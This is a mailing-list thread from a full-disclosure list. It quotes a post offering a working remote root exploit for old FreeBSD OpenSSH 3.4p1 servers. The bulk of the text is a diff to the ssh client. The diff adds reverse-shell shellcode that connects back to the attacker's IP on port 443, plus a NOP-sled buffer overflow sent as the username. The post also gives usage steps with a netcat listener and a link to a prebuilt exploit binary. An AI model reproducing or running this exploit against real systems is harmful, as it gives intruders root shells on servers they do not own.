Re: [Full-disclosure] Working Remote Root Exploit for OpenSSH 3.4p1 (FreeBSD)



you can apply the patch using the diff if you don't want to run that.

2011/7/1 Benji <me@xxxxxxxxx>:
So you want people to download your statically linked binary?

On Fri, Jul 1, 2011 at 4:45 PM, HI-TECH .
<isowarez.isowarez.isowarez@xxxxxxxxxxxxxx> wrote:

OpenSSH FreeBSD Remote Root Exploit
By Kingcope
Year 2011

Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924
run like ./ssh -1 -z <yourip> <target>
setup a netcat, port 443 on yourip first

a statically linked linux binary of the exploit can be found below
attached is a diff to openssh-5.8p2.

the statically linked binary can be downloaded from
http://isowarez.de/ssh_0day

I know these versions are really old, some seem to run
that tough.

-Cheers, King "the archaeologist" Cope

diff openssh-5.8p2/ssh.c openssh-5.8p2_2/ssh.c
149a150
char *myip;
195a197,203
"OpenSSH FreeBSD Remote Root Exploit\n"
"By Kingcope\n"
"Year 2011\n\n"
"Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n"
"Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n"
"run like ./ssh -1 -z <yourip> <target>\n"
"setup a netcat, port 443 on yourip first\n\n"
299c307
<       while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:p:qstvx"
---
      while ((opt = getopt(ac, av, "1246ab:c:e:fgi:kl:m:no:z:p:qstvx"
335a344,346
                      break;
              case 'z':
                      myip = optarg;
diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
667a668,719
//IP=\xc0\xa8\x20\x80
#define       IPADDR  "\xc0\xa8\x20\x80"
#define PORT  "\x27\x10"              /* htons(10000) */

char sc[] =
   "\x90\x90"
   "\x90\x90"
   "\x31\xc9"                 // xor    ecx, ecx
   "\xf7\xe1"                 // mul    ecx
   "\x51"                     // push   ecx
   "\x41"                     // inc    ecx
   "\x51"                     // push   ecx
   "\x41"                     // inc    ecx
   "\x51"                     // push   ecx
   "\x51"                     // push   ecx
   "\xb0\x61"                 // mov    al, 97
   "\xcd\x80"                 // int    80h
   "\x89\xc3"                 // mov    ebx, eax
   "\x68"IPADDR                       // push   dword 0101017fh
   "\x66\x68"PORT             // push   word 4135
   "\x66\x51"                 // push   cx
   "\x89\xe6"                 // mov    esi, esp
   "\xb2\x10"                 // mov    dl, 16
   "\x52"                     // push   edx
   "\x56"                     // push   esi
   "\x50"                     // push   eax
   "\x50"                     // push   eax
   "\xb0\x62"                 // mov    al, 98
   "\xcd\x80"                 // int    80h
   "\x41"                     // inc    ecx
   "\xb0\x5a"                 // mov    al, 90
   "\x49"                     // dec    ecx
   "\x51"                     // push   ecx
   "\x53"                     // push   ebx
   "\x53"                     // push   ebx
   "\xcd\x80"                 // int    80h
   "\x41"                     // inc    ecx
   "\xe2\xf5"                 // loop   -10
   "\x51"                     // push   ecx
   "\x68\x2f\x2f\x73\x68"     // push   dword 68732f2fh
   "\x68\x2f\x62\x69\x6e"     // push   dword 6e69622fh
   "\x89\xe3"                 // mov    ebx, esp
   "\x51"                     // push   ecx
   "\x54"                     // push   esp
   "\x53"                     // push   ebx
   "\x53"                     // push   ebx
   "\xb0\xc4\x34\xff"
   "\xcd\x80";                // int    80h


extern char *myip;

678a731,748

      char buffer[100000];

      printf("OpenSSH Remote Root Exploit\n");
      printf("By Kingcope\n");
      printf("Year 2011\n\n");
      printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702\n");
      printf("Unlocks SSH-1.99-OpenSSH_3.4p1 FreeBSD-20030924\n");
      printf("Connect back to: %s:443\n", myip);

      *((unsigned long*)(sc + 21)) = inet_addr(myip);
      *((unsigned short*)(sc + 27)) = htons(443);

      memset(buffer, 'V', 8096);
      memcpy(buffer+24, "\x6b\x4b\x0c\x08", 4); //
SSH-1.99-OpenSSH_3.4p1 FreeBSD-20020702
      memset(buffer+28, '\x90', 65535);
      memcpy(buffer+28+65535, sc, sizeof(sc));
      server_user=buffer;

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Relevant Pages